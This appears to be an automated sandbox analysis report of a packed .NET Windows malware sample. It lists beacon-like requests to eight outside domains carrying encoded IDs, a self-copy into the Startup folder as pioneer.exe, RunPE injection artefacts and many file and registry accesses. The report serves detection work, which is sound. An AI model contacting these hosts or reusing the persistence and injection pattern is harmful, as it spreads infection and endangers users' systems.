- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
- suspicious_request: http://www.brewpubibiza.com/hx139/?id=SbCAU8mf0Z9JEulPyR8cZS1aBijtu3+0k2tctwyGWY55djuHLbz5Gn2TowYWJj3A1MDLhwbR
- suspicious_request: http://www.xn--snyi-5na.com/hx139/?id=fyl9cbLQb5R+/8T8tzIY25clItzRxAgCn3SNdxJDm8Cu9sMr7e3Ony8kqC6wyP5YEVOUOgxM
- suspicious_request: http://www.group7schools.com/hx139/?id=DJDfPwBHTQu0QWWyWwUGOsEhw9IAZc4nfTj4bVnVPlkRWQtbgbVKudlyA9Qx2orpkx9kCxCD
- suspicious_request: http://www.cdccm.com/hx139/?id=cyOTfcvxCp4M5pb0CWMG0tQGARyzkoXay0uJyxtqrWvdXf+0P/vwE2HJ2IAVQD+wfJX22waZ
- suspicious_request: http://www.totokualalumpur.net/hx139/?id=oQ0PymUGNvA4epaJNfUUgTf9RmMpng9PBlanyGt5NfcqiuwlaN40BjQegrxIRT9tanqfRbpF
- suspicious_request: http://www.bastblossoz.info/hx139/?id=mBTUr0+VXJWv0jl26qEjK+wKvJf2gbCfKhowHOF+s/onaseJOIX9voAXatpS9NQPyTjEOKZx
- suspicious_request: http://www.bastblossoz.info/hx139/
- suspicious_request: http://www.lookpresent.info/hx139/
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://www.brewpubibiza.com/hx139/?id=SbCAU8mf0Z9JEulPyR8cZS1aBijtu3+0k2tctwyGWY55djuHLbz5Gn2TowYWJj3A1MDLhwbR
- url: http://www.xn--snyi-5na.com/hx139/?id=fyl9cbLQb5R+/8T8tzIY25clItzRxAgCn3SNdxJDm8Cu9sMr7e3Ony8kqC6wyP5YEVOUOgxM
- url: http://www.group7schools.com/hx139/?id=DJDfPwBHTQu0QWWyWwUGOsEhw9IAZc4nfTj4bVnVPlkRWQtbgbVKudlyA9Qx2orpkx9kCxCD
- url: http://www.cdccm.com/hx139/?id=cyOTfcvxCp4M5pb0CWMG0tQGARyzkoXay0uJyxtqrWvdXf+0P/vwE2HJ2IAVQD+wfJX22waZ
- url: http://www.totokualalumpur.net/hx139/?id=oQ0PymUGNvA4epaJNfUUgTf9RmMpng9PBlanyGt5NfcqiuwlaN40BjQegrxIRT9tanqfRbpF
- url: http://www.bastblossoz.info/hx139/?id=mBTUr0+VXJWv0jl26qEjK+wKvJf2gbCfKhowHOF+s/onaseJOIX9voAXatpS9NQPyTjEOKZx
- url: http://www.bastblossoz.info/hx139/
- url: http://www.lookpresent.info/hx139/
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 7.98, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0004a600, virtual_size: 0x0004a454
| Behavior analysis details | |||||
|---|---|---|---|---|---|
| Machine name | Machine label | Machine manager | Started | Ended | Duration |
| Seven01_64 | Seven01_64 | VirtualBox | 2017-11-02 18:48:44 | 2017-11-02 18:51:36 | 172 |
10 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\neeir.exe.config C:\Users\Seven01\AppData\Local\Temp\neeir.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\unrar\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Python27\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\AppData\Local\Temp\neeir.exe.Local\ C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows C:\Windows\winsxs C:\Windows\Microsoft.NET\Framework\v4.0.30319 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\System32\l_intl.nls C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll \Device\KsecDD C:\Users\Seven01\AppData\Local\Temp\neeir.INI C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol21.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI C:\Windows\Globalization\it-it.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\Globalization\en-us.nlp C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\Globalization\it.nlp C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI C:\Users\Seven01\AppData\Local\Temp\it-IT\neeir.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\neeir.resources\neeir.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\neeir.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\neeir.resources\neeir.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\neeir.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\neeir.resources\neeir.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\neeir.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\neeir.resources\neeir.resources.exe C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\msvcrt.dll C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pioneer.exe \Device\NamedPipe\ C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2080.18068546 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2080.18068546 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2080.18068578 C:\Windows\System32\Branding\Basebrd\Basebrd.dll C:\Windows\Branding\Basebrd\basebrd.dll C:\Windows\Globalization\Sorting\sortdefault.nls C:\Users\Seven01\AppData\Local\Temp\"C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pioneer.exe" C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pioneer.exe.config C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pioneer.exe.Local\ C:\Users\Seven01\AppData\Roaming C:\Users\Seven01\AppData\Roaming\Microsoft\Windows C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs C:\Users\Seven01\AppData\Roaming\Microsoft C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pioneer.INI C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources\mscorlib.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\mscorlib.resources\mscorlib.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\neeir.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\neeir.resources\neeir.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\neeir.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\neeir.resources\neeir.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\neeir.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\neeir.resources\neeir.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\neeir.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\neeir.resources\neeir.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll\RunPEDll.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunPEDll\RunPEDll.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it-IT\stub.resources\stub.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\it\stub.resources\stub.resources.exe C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msvcrt.dll C:\Users\Seven01\AppData\Local\Temp\pioneer.txt C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2344.18071031 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2344.18071031 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2344.18071031 C:\Users\Seven01\AppData\Local\Temp\reg.* C:\Users\Seven01\AppData\Local\Temp\reg C:\ProgramData\Oracle\Java\javapath\reg.* C:\ProgramData\Oracle\Java\javapath\reg C:\Windows\System32\reg.* C:\Windows\System32\reg.COM C:\Windows\System32\reg.exe C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Windows\SysWOW64\ntdll.dll
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\neeir.exe.config C:\Users\Seven01\AppData\Local\Temp\neeir.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\System32\l_intl.nls \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol21.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll \Device\NamedPipe\ C:\Windows\Branding\Basebrd\basebrd.dll C:\Windows\Globalization\Sorting\sortdefault.nls C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pioneer.exe.config C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pioneer.exe C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Windows\SysWOW64\ntdll.dll
Write Files
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pioneer.exe C:\Users\Seven01\AppData\Local\Temp\pioneer.txt
Delete Files
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2080.18068546 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2080.18068546 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2080.18068578 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2344.18071031 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2344.18071031 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2344.18071031
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\neeir.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3ce665f8\46b2b7f7 HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies 